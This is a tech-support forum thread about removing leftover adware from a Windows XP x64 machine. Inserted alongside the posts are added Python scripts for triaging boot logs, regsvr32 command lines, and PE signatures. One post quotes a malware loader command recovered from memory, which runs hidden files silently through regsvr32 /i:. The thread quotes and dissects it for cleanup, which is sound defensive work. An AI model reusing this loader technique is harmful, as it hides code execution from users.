The Mother Board

Motherboards.org forums. Free tech support, motherboard ID, and more.
It is currently Fri Sep 21, 2018 6:00 am

All times are UTC - 8 hours




[ 44 posts ]  Go to page Previous  1, 2, 3, 4, 5  Next

PostPosted: Mon Jan 12, 2015 7:11 am
Mobo-fu Master (Joined: Sun May 06, 2001 12:01 am; Posts: 37463; Location: Netherlands)
Remove Vosteran:
https://forums.malwarebytes.org/index.p ... -vosteran/

The logfile: are you running IIS on that box by any chance?
http://serverfault.com/questions/100380 ... ssion-snag

One other thing I note is that you are running in msconfig mode (so you temporarily disabled some stuff). I can imagine msconfig is doing so through a startup/logon script of some sort.

_________________
We hate rut, but we fear change.
********************************
System error, strike any user to continue...


PostPosted: Mon Jan 12, 2015 7:37 am
Green Belt (Joined: Tue Apr 15, 2003 12:56 pm; Posts: 217; Location: Dover, NH USA)
I am attaching ntBootLog.txt as well as a few .reg files containing what I found in the Windows registry.

Code:
Loaded driver \SystemRoot\System32\Drivers\a70km16k.SYS
Loaded driver \SystemRoot\System32\Drivers\ax0jhlar.SYS

Neither one of these files physically exists... that is, I did a full search of my HDD, including all folders and hidden files.

These two stood out as suspicious O_o...

However, upon checking I found that ax0jhlar is linked to the DAEMON Tools virtual SCSI drive.
I had a 2nd virtual drive, a BD-ROM, through DT... I got rid of it as I didn't really need two... so I will test boot again...

Code:
[HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 4]
"Interrupt"=dword:00000009
"IOAddress"=dword:0000fff0
"Driver"="ax0jhlar"

Code:
[HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 5]
"Interrupt"=dword:00000009
"IOAddress"=dword:0000ffe8
"Driver"="a70km16k"


________________________________________________________________________
edit:

IIS (Internet Information Services)? No, definitely not; I do not even have it installed.
Didn't feel I needed it...

Vosteran!!!!!
Yes, I did run into that, though I could have sworn I had dealt with it back on the old HDD (i.e. WinXP Pro 32-bit SP3).

Whatever the case... I HIT IT HARD AND WITH A VENGEANCE...

I was grabbing an update from SourceForge (they have been using these downloaders to help programmers generate revenue >_< BOOO, ask for donations if you need the $$).

I guess I forgot to click the "enable direct link" that time... anyhow, I grabbed it and ran...

Here is one such project which has the downloader/installer $$ links enabled ;_; =(
https://sourceforge.net/projects/filezi ... nt/3.10.0/

Since FileZilla (v3.9.0) it's been Vista and newer only, so it probably wasn't this project I had downloaded...

Anyhow, before I knew it, it was already installing $%^!@#... so I axed that installer forcefully and proceeded to HACK it out, starting with Spybot S&D and using all available tools, including manual searches of the registry and manually hacking it out of FF... I even tried its uninstaller as well, probably...

Possible it had leftovers? Though I have made many complete scans using Spybot, M$ MRT, TDSSKiller (it's showing clean, so it isn't a rootkit at least...).


Attachments:
Windows Event Viewer Log Files_.rar [2.39 KiB]
[ntBootLog] & [reg-export].rar [3.5 KiB]
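Added example (Python, not part of the original post): the correlation the poster did by hand, scripted. It parses the "Loaded driver" lines from ntbtlog.txt and a .reg export of HKLM\HARDWARE\DEVICEMAP\Scsi, maps each driver name to the SCSI port that claims it, flags names that look machine-generated, and records whether the .SYS actually exists under %SystemRoot%. A generated-looking name that is claimed by a SCSI port and has no file on disk is the pattern a virtual-drive filter like SPTD/DAEMON Tools produces (it registers its virtual SCSI miniport under a random name, which is the thread's own finding for ax0jhlar); the same kind of name with no port claiming it is the one worth pulling apart. Assumptions: the "eight lowercase alphanumerics with at least one digit" heuristic is mine, the ntoskrnl line in the sample is added for contrast, windows_file_exists is a hypothetical helper, and the offline run passes a stub for it.

```python
import os
import re
from typing import Callable, Dict, List

# Constructed sample input: the two "Loaded driver" lines quoted from the
# poster's ntBootLog.txt, plus a normal kernel line added for contrast.
NTBTLOG_SAMPLE = r"""Loaded driver \SystemRoot\system32\ntoskrnl.exe
Loaded driver \SystemRoot\System32\Drivers\a70km16k.SYS
Loaded driver \SystemRoot\System32\Drivers\ax0jhlar.SYS
"""

# Constructed sample input: the DEVICEMAP\Scsi keys exported above.
REG_SAMPLE = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 4]
"Interrupt"=dword:00000009
"IOAddress"=dword:0000fff0
"Driver"="ax0jhlar"

[HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 5]
"Interrupt"=dword:00000009
"IOAddress"=dword:0000ffe8
"Driver"="a70km16k"
"""

LOADED_RE = re.compile(r"^Loaded driver\s+(\S+)\s*$", re.IGNORECASE)
KEY_RE = re.compile(r"^\[(.+)\]$")
VALUE_RE = re.compile(r'^"([^"]+)"=(.*)$')
# Heuristic (assumption): SPTD-style generated names are eight lowercase
# letters/digits with at least one digit; Microsoft driver names rarely are.
RANDOM_NAME_RE = re.compile(r"^(?=.*\d)[a-z0-9]{8}$")


def parse_ntbtlog(text: str) -> Dict[str, str]:
    """Map lowercase driver base name (no extension) -> path as logged."""
    drivers: Dict[str, str] = {}
    for line in text.splitlines():
        m = LOADED_RE.match(line.strip())
        if m:
            path = m.group(1)
            name = path.rsplit("\\", 1)[-1].rsplit(".", 1)[0].lower()
            drivers[name] = path
    return drivers


def parse_reg_export(text: str) -> Dict[str, Dict[str, str]]:
    """Minimal .reg parser: key path -> {value name: data}. Handles the
    single-line string and dword values present in a DEVICEMAP export."""
    keys: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        km = KEY_RE.match(line)
        if km:
            current = km.group(1)
            keys[current] = {}
            continue
        vm = VALUE_RE.match(line)
        if vm and current is not None:
            name, data = vm.groups()
            if len(data) >= 2 and data[0] == data[-1] == '"':
                data = data[1:-1]          # REG_SZ: strip the quotes
            keys[current][name] = data     # dword:... is kept as written
    return keys


def scsi_port_drivers(reg: Dict[str, Dict[str, str]]) -> Dict[str, str]:
    """Map lowercase driver name -> 'Scsi Port N' for every port in the export."""
    ports: Dict[str, str] = {}
    for key, values in reg.items():
        parts = key.split("\\")
        if len(parts) >= 2 and parts[-2].lower() == "scsi" and "Driver" in values:
            ports[values["Driver"].lower()] = parts[-1]
    return ports


def windows_file_exists(logged_path: str) -> bool:
    """Hypothetical helper: resolve \\SystemRoot against %SystemRoot% and test the file."""
    root = os.environ.get("SystemRoot", r"C:\Windows")
    return os.path.exists(logged_path.replace("\\SystemRoot", root, 1))


def triage(ntbtlog_text: str, reg_text: str,
           file_exists: Callable[[str], bool] = windows_file_exists) -> List[Dict]:
    """One finding per loaded driver with a generated-looking name: where it was
    logged from, which SCSI port claims it, and whether the .SYS is on disk."""
    loaded = parse_ntbtlog(ntbtlog_text)
    ports = scsi_port_drivers(parse_reg_export(reg_text))
    findings = []
    for name, path in sorted(loaded.items()):
        if RANDOM_NAME_RE.match(name):
            findings.append({"driver": name, "logged_path": path,
                             "scsi_port": ports.get(name),
                             "on_disk": file_exists(path)})
    return findings


if __name__ == "__main__":
    # Offline run against the constructed samples; drop the stub on a real box.
    for f in triage(NTBTLOG_SAMPLE, REG_SAMPLE, lambda p: False):
        verdict = "virtual-drive filter (SPTD-style)" if f["scsi_port"] else "UNEXPLAINED: pull the file"
        print(f"{f['driver']}: port={f['scsi_port']} on_disk={f['on_disk']} -> {verdict}")
```

On a live box, feed it the real ntbtlog.txt and a fresh `reg export HKLM\HARDWARE\DEVICEMAP\Scsi` and leave the file check at its default; the DEVICEMAP tree is rebuilt at every boot, so it has to be exported from the same boot the log came from.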
PostPosted: Mon Jan 12, 2015 8:28 am
Green Belt (Joined: Tue Apr 15, 2003 12:56 pm; Posts: 217; Location: Dover, NH USA)
Attached three images...
The file names describe the contents (PNG screenshots)...


Attachments:
Local User Groups and Accounts_Users.png [29.98 KiB]
Local User Groups and Accounts_Groups.png [47.67 KiB]
Device Manager__SPTD_Virtual Devices after all.png [96.52 KiB]
PostPosted: Mon Jan 12, 2015 9:00 am
Green Belt (Joined: Tue Apr 15, 2003 12:56 pm; Posts: 217; Location: Dover, NH USA)
I am attaching an archive containing the in-memory strings from cmd.exe.

I found this among them:

Code:
REM/?
or  /F %i in ('dir /b /a:h-d /w "C:\Documents and Settings\All Users\Application Data\1837308050\*"') do start /b regsvr32.exe /s /n /i:"/64 QV0RLkDNJMohCCDWYSLNtdRXIPOZUAogex4Cn5ppPJig1KKm3 " "C:\Documents and Settings\All Users\Application Data\1837308050\%i"
b regsvr32.exe /s /n /i:"/64 QV0RLkDNJMohCCDWYSLNtdRXIPOZUAogex4Cn5ppPJig1KKm3 " "C:\Documents and Settings\All Users\Application Data\1837308050\%i"
r32.exe /s /n /i:"/64 QV0RLkDNJMohCCDWYSLNtdRXIPOZUAogex4Cn5ppPJig1KKm3 " "C:\Documents and Settings\All Users\Application Data\1837308050\%i"
COMSPEC


Attachments:
cmd & drwtsn32 logs.rar [54.58 KiB]
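The `for /F ... regsvr32.exe /s /n /i:` command in those strings is the interesting part. `dir /b /a:h-d` lists only hidden, non-directory files in that numbered Application Data folder; for each one, regsvr32 is started with `/s` (silent), `/n` (do not call DllRegisterServer) and `/i:` (call DllInstall, passing the quoted text verbatim), so a signed Microsoft binary becomes a loader for whatever is dropped there, one file at a time, and nothing gets registered in HKCR. Added example (Python, not from the original post) that scans a strings dump, or any other command-line source such as Run keys, scheduled tasks or a process list, for regsvr32 invocations and pulls out the flags, the DllInstall argument, the target and the directory being enumerated, then flags the DllInstall-only-with-hidden-files shape. The sample input is constructed from the fragments quoted above (the truncated first one reassembled into a full line) plus one benign regsvr32 line so the filter has something to leave alone; the suspicion rules are my own heuristics.

```python
import re
from typing import Dict, List, Optional

# Constructed sample: the cmd.exe memory strings quoted above (the truncated
# first fragment reassembled into one line) plus one benign regsvr32 line.
STRINGS_SAMPLE = r"""REM/?
for /F %i in ('dir /b /a:h-d /w "C:\Documents and Settings\All Users\Application Data\1837308050\*"') do start /b regsvr32.exe /s /n /i:"/64 QV0RLkDNJMohCCDWYSLNtdRXIPOZUAogex4Cn5ppPJig1KKm3 " "C:\Documents and Settings\All Users\Application Data\1837308050\%i"
b regsvr32.exe /s /n /i:"/64 QV0RLkDNJMohCCDWYSLNtdRXIPOZUAogex4Cn5ppPJig1KKm3 " "C:\Documents and Settings\All Users\Application Data\1837308050\%i"
COMSPEC
regsvr32.exe /s "C:\Program Files\Common Files\System\ado\msado15.dll"
"""

REGSVR_RE = re.compile(r"\bregsvr32(?:\.exe)?\s+(?P<args>.+)$", re.IGNORECASE)
# The for /F wrapper:  in ('dir <opts> "<dir>"')
DIR_RE = re.compile(r"""in\s*\(\s*'dir\s+(?P<opts>[^']*?)"(?P<dir>[^"]+)"\s*'\s*\)""", re.IGNORECASE)
NUMERIC_DIR_RE = re.compile(r"\\\d{6,}(?:\\|$)")   # heuristic: all-digit folder name


def split_cmdline(s: str) -> List[str]:
    """Split on whitespace, keeping double-quoted runs together (quotes dropped).
    Enough for regsvr32 arguments; not a full cmd.exe parser."""
    tokens, cur, in_quote = [], [], False
    for ch in s:
        if ch == '"':
            in_quote = not in_quote
        elif ch.isspace() and not in_quote:
            if cur:
                tokens.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
    if cur:
        tokens.append("".join(cur))
    return tokens


def parse_regsvr32(line: str) -> Optional[Dict]:
    """Pull the flags, DllInstall argument and target out of one regsvr32
    invocation; return None if the line contains no regsvr32 call."""
    m = REGSVR_RE.search(line)
    if not m:
        return None
    flags, targets, install_arg = set(), [], None
    for tok in split_cmdline(m.group("args")):
        if tok.startswith("/") and len(tok) > 1:
            key = tok[1].lower()
            flags.add(key)
            if key == "i" and tok[2:3] == ":":
                install_arg = tok[3:].strip()   # handed verbatim to DllInstall
        else:
            targets.append(tok)
    target = targets[-1] if targets else ""
    target_dir = target.rsplit("\\", 1)[0] if "\\" in target else ""
    dm = DIR_RE.search(line)
    enumerates_hidden = bool(dm and re.search(r"/a:?h", dm.group("opts"), re.IGNORECASE))
    if dm:                                      # prefer the enumerated folder
        target_dir = dm.group("dir").rsplit("\\", 1)[0]
    dllinstall_only = "n" in flags and "i" in flags   # /n: DllRegisterServer never runs
    suspicious = dllinstall_only and (
        enumerates_hidden
        or bool(NUMERIC_DIR_RE.search(target_dir))
        or not target.lower().endswith(".dll"))
    return {"target": target, "target_dir": target_dir, "flags": sorted(flags),
            "install_arg": install_arg, "enumerates_hidden": enumerates_hidden,
            "suspicious": suspicious}


def scan_strings(text: str) -> List[Dict]:
    """Run parse_regsvr32 over every line, de-duplicating repeated fragments
    of the same command (strings dumps contain many partial copies)."""
    seen, findings = set(), []
    for line in text.splitlines():
        f = parse_regsvr32(line)
        if f and (f["target"], f["install_arg"]) not in seen:
            seen.add((f["target"], f["install_arg"]))
            findings.append(f)
    return findings


if __name__ == "__main__":
    for f in scan_strings(STRINGS_SAMPLE):
        tag = "SUSPICIOUS" if f["suspicious"] else "ok"
        print(f"[{tag}] regsvr32 /{' /'.join(f['flags'])} target={f['target']} "
              f"dir={f['target_dir']} hidden_enum={f['enumerates_hidden']} "
              f"dllinstall_arg={f['install_arg']!r}")
```

The useful output is the folder: whatever is (or was) in it is the payload, and the /i: string is the configuration it was launched with, both worth keeping with the logs even after the folder is gone. A quiet cmd window that just sits there is consistent with the `for` loop finding nothing to launch.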
PostPosted: Mon Jan 12, 2015 9:29 am
Mobo-fu Master (Joined: Sun May 06, 2001 12:01 am; Posts: 37463; Location: Netherlands)
If bleepingcomputer has no answer:
http://www.bleepingcomputer.com/forums/ ... mpt-error/
then we will have to dig seriously deep. Usually they know what is cooking...

_________________
We hate rut, but we fear change.
********************************
System error, strike any user to continue...


PostPosted: Mon Jan 12, 2015 9:47 am
Karlsweldt, Mobo-fu Master (Joined: Wed Nov 12, 2003 11:57 am; Posts: 20860; Location: 07438)
Your reference of " Application Data\1837308050\%i " turns up links to Vosteran.. a type of browser virus that wants to redirect you to other sites. "Free" malware with uncertified sites.
http://www.2-viruses.com/remove-vosteran-com-virus

There should be a folder for its files, and look there for an "uninstall" or "unwise" command line.
It should be listed in "Add/remove programs" from the Control Panel. But maybe not.
Might be time to do a Registry edit, taking out any references to it. But do a backup first!
You might be able to do a search for any remnants from the command prompt..
Start > Run > type in cmd and then type in Dir C:\*.vosteran/a/s
That will search all directories, sub-directories and files.. except the Registry.

_________________
F@H.. to solve mankind's maladies.. in our lifetimes!


PostPosted: Mon Jan 12, 2015 9:53 am
Green Belt (Joined: Tue Apr 15, 2003 12:56 pm; Posts: 217; Location: Dover, NH USA)
That Q&A you linked to... no one has replied to it yet...
It definitely looks like the same issue O_o...

But I've been up all night, so either I am going for a walk or going to bed.

Thanks again for the awesome help, Motherboards forums ;^_^;
At times when I couldn't solve something on my own
I could always go to Motherboards.org/forums ;^_^;

Eyy Karl, I already axed Vosteran a while back...
I got rid of every trace of it, for absolutely certain.

Scans using MRT come up with nothing too...

I will try a test: I'll recreate that folder as named and see if the cmd at least auto-exits for now... no files.

_________________________________________________
EDIT:

Trying out this program called STOPzilla... O_o...


Attachments:
STOPZilla Scan pic_40p.jpg [59.72 KiB]
STOPZilla Scan pic.jpg [68.31 KiB]
PostPosted: Mon Jan 12, 2015 12:21 pm
Green Belt (Joined: Tue Apr 15, 2003 12:56 pm; Posts: 217; Location: Dover, NH USA)
99.98% of them were false positives.

There was one leftover Conduit entry in the registry... it's gone now, but it sat next to this one:
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}
n (DWORD) = 1

All of the HOSTS entries WERE Spybot S&D immunizations, so I had to reapply them... :roll:

Another was the never-touched or -used small exe that is part of the install4j that comes with Azureus (BitTorrent).
I never click on the offers, and all the updates I get for Azureus come via the dev channel, so I never bother with the original installer except when doing a fresh install...

After which I did a CCleaner registry scan again and found these...
Code:
[HKEY_CLASSES_ROOT\Mslablti.MarshalableTI]
@="MarshalableTI Class"

[HKEY_CLASSES_ROOT\Mslablti.MarshalableTI\CLSID]
@="{466D66FA-9616-11D2-9342-0000F875AE17}"

[HKEY_CLASSES_ROOT\Mslablti.MarshalableTI\CurVer]
@="Mslablti.MarshalableTI.1"


[HKEY_CLASSES_ROOT\Mslablti.MarshalableTI.1]
@="MarshalableTI Class"

[HKEY_CLASSES_ROOT\Mslablti.MarshalableTI.1\CLSID]
@="{466D66FA-9616-11D2-9342-0000F875AE17}"



The other false positives included:
exes and files used for patching Elder Scrolls 3: Morrowind with a graphics overhaul
http://www.nexusmods.com/morrowind/mods/36945/

C:\Program Files\Explorer Suite\
Signature Explorer.exe
which is part of CFF Explorer.exe, used for seeing inside of an exe or dll.
It was suggested for changing the OS and Subsystem minimum on the Firefox Nightly v37 Windows 64-bit build, so as to try and make it run on XP64 (stuff they did requires Vista or newer =p).

So overall, STOPzilla was a waste of time >_<

edit:

I tried recreating that folder; no... no auto-closing of that cmd window... whatever... ;>_<;
C:\Documents and Settings\All Users\Application Data\1837308050

IDK WHAT ^^%$*& STOPzilla did, but it FCK'd Spybot's immunizations; they are UN-immunizable now... >_<!!

I have tried deleting the whole key in the registry for each and reapplying the immunizations; no go >_<


Attachments:
Spybot_screenshot.jpg [58.57 KiB]
immudebug.rar [45.71 KiB]
PostPosted: Mon Jan 12, 2015 5:12 pm
Karlsweldt, Mobo-fu Master (Joined: Wed Nov 12, 2003 11:57 am; Posts: 20860; Location: 07438)
Forgot to include about the CMD prompt.. when done, simply type in " exit " to close.
Hopefully, you have turned off the Windows 'restore' feature while doing this cleansing. If not, Windows will likely undo all your efforts on the next normal boot!
Might be an idea to kill off all the suspect browser add-ons and similar.. then see what happens.

_________________
F@H.. to solve mankind's maladies.. in our lifetimes!


PostPosted: Mon Jan 12, 2015 5:21 pm
Green Belt (Joined: Tue Apr 15, 2003 12:56 pm; Posts: 217; Location: Dover, NH USA)
A few recommended by a local tech company I know (the guy that owns it helped set up that LAN center I had volunteered for).

Trying HijackThis... logs attached...
There doesn't appear to be a problem apparent here either... >_<

Also I took a screenshot and log files from RogueKiller64.

Code:
explorer.exe
Windows Explorer
v6.00.3790.3959 (srv03_sp2_rtm.070216-1710)
EXPLORER.EXE
Microsoft® Windows® Operating System
1.30 MB (1,364,480 bytes)
Created :  Sunday, February 18, 2007, 7:00:00 AM
Modified:  Sunday, February 18, 2007, 7:00:00 AM


Code:
cryptdll.dll
Cryptography Manager
v5.2.3790.3959 (srv03_sp2_rtm.070216-1710)
cryptdll.dll
Microsoft® Windows® Operating System
47.0 KB (48,128 bytes)
Created :  Sunday, February 18, 2007, 7:00:00 AM
Modified:  Sunday, February 18, 2007, 7:00:00 AM


Neither is digitally signed?! Should they be?!

_____________________________________________________________________________________________________

Karlsweldt wrote:
Forgot to include about the CMD prompt.. when done, simply type in " exit " to close.
Hopefully, you have turned off the Windows 'restore' feature while doing this cleansing. If not, Windows will likely undo all your efforts on the next normal boot!
Might be an idea to kill off all the suspect browser add-ons and similar.. then see what happens.



Huh? I never use System Restore; it's the first thing I ax on a new build, as it's a waste of resources...
I got rid of the browser stuff some time ago. I haven't had any real threat in a long time, only what appears to be a leftover at worst...

I have updated the archive again with adwcleaner_4.107.exe.
It found a few things I had missed, nothing too bad; I added its logs to the archive...


Attachments:
File comment: Contains the logs for HiJackThis, RogueKiller (and screenshot), adwcleaner, etc.
NewLogs and screenshots.rar [180.64 KiB]
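On the "neither is digitally signed" question: a scanner that reports a file as unsigned is normally testing only for an embedded Authenticode signature, i.e. a Certificate Table entry in the PE optional header. Windows system files of that era (the 5.2.3790 srv03_sp2 build string is the Server 2003 SP2 code base that XP x64 runs on) mostly ship without one; their hashes are listed in signed catalog files under %SystemRoot%\System32\CatRoot instead, which is why explorer.exe and cryptdll.dll show as "not signed" in RogueKiller yet pass sigverif.exe (File Signature Verification) or `signtool verify /a`. The matching build string and date on both files are what one service-pack install set looks like. Added example (Python, not from the original thread) of exactly what such a check reads: it walks the DOS and PE headers to the security data directory and reports whether a WIN_CERTIFICATE blob is present, malformed or absent. The PE images it runs on are constructed in memory (headers only, not loadable), so it runs offline; point check_file at a real binary to use it.

```python
import struct
import sys
from typing import Dict, Optional

IMAGE_DIRECTORY_ENTRY_SECURITY = 4          # the Certificate Table slot
PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B
WIN_CERT_REVISION_2_0 = 0x0200              # WIN_CERTIFICATE.wRevision
WIN_CERT_TYPE_PKCS_SIGNED_DATA = 0x0002     # WIN_CERTIFICATE.wCertificateType


def security_directory(pe: bytes) -> Optional[Dict[str, int]]:
    """Return the Certificate Table {'offset', 'size'} from the optional header,
    or None when the image carries no embedded signature at all. The offset is a
    raw file offset, not an RVA, so no section mapping is needed."""
    if len(pe) < 0x40 or pe[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    file_header = e_lfanew + 4                        # IMAGE_FILE_HEADER, 20 bytes
    size_of_optional = struct.unpack_from("<H", pe, file_header + 16)[0]
    opt = file_header + 20
    magic = struct.unpack_from("<H", pe, opt)[0]
    if magic == PE32_MAGIC:
        count_off, dirs_off = opt + 92, opt + 96
    elif magic == PE32PLUS_MAGIC:
        count_off, dirs_off = opt + 108, opt + 112
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    n_dirs = struct.unpack_from("<I", pe, count_off)[0]
    entry = dirs_off + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY
    if n_dirs <= IMAGE_DIRECTORY_ENTRY_SECURITY or entry + 8 > opt + size_of_optional:
        return None
    offset, size = struct.unpack_from("<II", pe, entry)
    return {"offset": offset, "size": size} if offset and size else None


def embedded_signature(pe: bytes) -> Dict[str, str]:
    """Classify what a 'digitally signed?' column is really testing:
    'none'         no Certificate Table (catalog-signed or unsigned: check the catalogs)
    'authenticode' a WIN_CERTIFICATE wrapping PKCS#7 SignedData is present
    'malformed'    the table points outside the file or at a bad header"""
    d = security_directory(pe)
    if d is None:
        return {"state": "none",
                "detail": "no embedded signature; verify via catalogs (sigverif.exe / signtool verify /a)"}
    off, size = d["offset"], d["size"]
    if off + 8 > len(pe) or off + size > len(pe):
        return {"state": "malformed", "detail": "Certificate Table points outside the file"}
    length, revision, cert_type = struct.unpack_from("<IHH", pe, off)
    if length > size or revision != WIN_CERT_REVISION_2_0 or cert_type != WIN_CERT_TYPE_PKCS_SIGNED_DATA:
        return {"state": "malformed", "detail": "WIN_CERTIFICATE header is not revision 2.0 PKCS#7"}
    return {"state": "authenticode",
            "detail": "PKCS#7 SignedData, %d bytes at file offset 0x%x" % (length - 8, off)}


def build_minimal_pe(with_signature: bool) -> bytes:
    """Constructed test image (assumption: headers only, not loadable): a PE32
    header with 16 data directories and no sections, optionally followed by a
    placeholder WIN_CERTIFICATE so the parser above has something to find."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    file_header = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 96 + 16 * 8, 0x0102)
    opt_fixed = struct.pack("<H", PE32_MAGIC) + b"\0" * 90 + struct.pack("<I", 16)
    header_len = len(dos) + 4 + len(file_header) + len(opt_fixed) + 16 * 8
    dirs = [(0, 0)] * 16
    cert = b""
    if with_signature:
        payload = b"\x30\x82\x00\x3c" + b"\0" * 60      # placeholder DER, not a real signature
        cert = struct.pack("<IHH", 8 + len(payload), WIN_CERT_REVISION_2_0,
                           WIN_CERT_TYPE_PKCS_SIGNED_DATA) + payload
        dirs[IMAGE_DIRECTORY_ENTRY_SECURITY] = (header_len, len(cert))
    return (dos + b"PE\0\0" + file_header + opt_fixed
            + b"".join(struct.pack("<II", a, b) for a, b in dirs) + cert)


def check_file(path: str) -> Dict[str, str]:
    """Classify a real file on disk (the same test the scanner's column applies)."""
    with open(path, "rb") as fh:
        return embedded_signature(fh.read())


if __name__ == "__main__":
    for p in sys.argv[1:]:
        r = check_file(p)
        print(f"{p}: {r['state']} ({r['detail']})")
```

A "none" result is not a verdict either way; the follow-up is to hash the file and look it up in the catalogs (sigverif.exe does this for the whole system directory), and only a file that fails both the embedded and the catalog check is actually unsigned.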